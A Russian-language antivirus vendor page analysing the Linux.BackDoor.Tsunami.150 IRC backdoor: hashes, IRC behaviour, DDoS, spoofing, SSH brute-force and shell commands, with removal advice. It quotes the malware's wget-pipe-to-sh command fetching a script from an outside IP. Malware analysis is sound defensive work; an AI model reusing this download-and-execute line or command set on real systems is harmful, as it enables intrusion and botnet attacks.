Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Linux.BackDoor.Tsunami.150

Добавлен в вирусную базу Dr.Web: 2015-07-23

Описание добавлено:

SHA1:

  • 3a99f7816c6864fd36ceea3380e591d337b0b241 (unpacked)
  • 691704fb9de3e1d4a6c5b84b99be71ef375257a8 (packed)

Бэкдор для операционных систем семейства Linux, устанавливаемый троянцем Linux.PNScan.1. В качестве лок-файла используется "/var/run/.boss.pid".

Для соединения с управляющим IRC-сервером формирует строку имени и псевдонима следующим образом:

m64|dog|root|%c%c%c%c%c%c%c%c%c

где %c – случайный символ из набора цифр ("0123456789").

При успешном подключении к IRC-серверу отправляет команды:

NICK <nick>\n
USER x00 localhost localhost :dogscan\n

где <nick> - псевдоним, сформированный по указанному выше алгоритму.

При подключении к IRC-серверу вредоносная программа ожидает поступления входящих команд. Бэкдор способен выполнять следующий базовый набор команд:

КомандаДействиеКомментарий
352Установить поддельный IP
376Зайти на каналSend(fd, "MODE %s -xi\n", nick);
Send(fd, "MODE %s +B\n", nick);
Send(fd, "JOIN %s :%s\n", chan, pass);
433Сгенерировать новый ник
ERRORСгенерировать новый ник
422Зайти на каналSend(fd, "MODE %s -xi\n", nick);
Send(fd, "MODE %s +B\n", nick);
Send(fd, "JOIN %s :%s\n", chan, pass);
NICKПоменять ник на строку из команды
PINGОтправить PONG
PRIVMSGВыполнить специальную команду

Помимо этого, троянец способен выполнять следующий набор расширенных команд:

КомандаДействиеСинтаксис
RANDOMFLOODСлучайным образом переключиться между режимами ACK и SYN FloodRANDOMFLOOD <target> <port> <secs>
NSACKFLOODACK FloodNSACKFLOOD <target> <port> <secs>
NSSYNFLOODSYN FloodNSSYNFLOOD <target> <port> <secs>
ACKFLOODACK Flood (spoofed)
SYNFLOODSYN Flood (spoofed)SYNFLOOD <target> <port> <secs>
UDPUDP FloodUDP <target> <port> <secs>
UNKNOWNНачать DDoS-атакуUNKNOWN <target> <secs>
SERVERСменить сервер на указанный в команде
GETSPOOFSПолучить параметры спуфинга
SPOOFSУстановить IP или диапазон IP для спуфингаSPOOFS <iprange/ip>
GETВыполнить загрузку указанного файлаGET <url> <save as>
VERSIONВозвратить версию бэкдора
KILLALLПрекратить DDoS-атаку
HELPПоказать список доступных команд
CBACKБэкконнектCBACK <ip> <port> connectback shell
SCANRNDВзлом SSH. Выбираются случайные IP из диапазона, используется стандартный словарьSCANRND <192 or 192.168 or 192.168.0> <threads> <minutes>
SCANRND2Взлом SSH. Выбираются случайные IP из диапазона, словарь указывается во входных параметрахSCANRND2 <192 or 192.168 or 192.168.0> <threads> <minutes> <user> <passwd>
SCANSUBВзлом SSH. Перебираются все IP из диапазона, используется стандартный словарьSCANSUB <192.168> <threads>
SCANSUB2Взлом SSH. Перебираются все IP из диапазона, словарь указывается во входных параметрахSCANSUB2 <192.168> <threads> <user> <passwd>
DOGRNDВзлом SSH. Перебираются случайные IP из диапазона, используется стандартный словарьDOGRND <192 or 192.168 or 192.168.0> <threads> <minutes>
DOGSUBВзлом SSH. Перебираются все IP из диапазона, используется стандартный словарьDOGSUB <192.168> <threads>
IRCОтправка указанных команд IRC на серверIRC <arg1> <arg2> <arg...>
SHВыполнить набор sh-командSH <arg1> <arg2> <arg...>

SCANRND, SCANRND2, SCANSUB, SCANSUB2 после успешного подбора пары login:password выполняют в удаленной системе команду:

wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>↦1

или

wget -qO - http://104.199.135.124/wgsh | sh > /dev/null 2>↦1 

Скачиваемые скрипты устанавливают в систему Linux.BackDoor.Tsunami.144.

DOGRND, DOGSUB после подбора пары login:password выполняют команду:

uname -a || echo - 

После чего пользователю "##scaninfo##" в IRC-чате будет послана информация вида:

[g+] <login>@<ip> | <password> | <os> \n

Рекомендации по лечению


Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру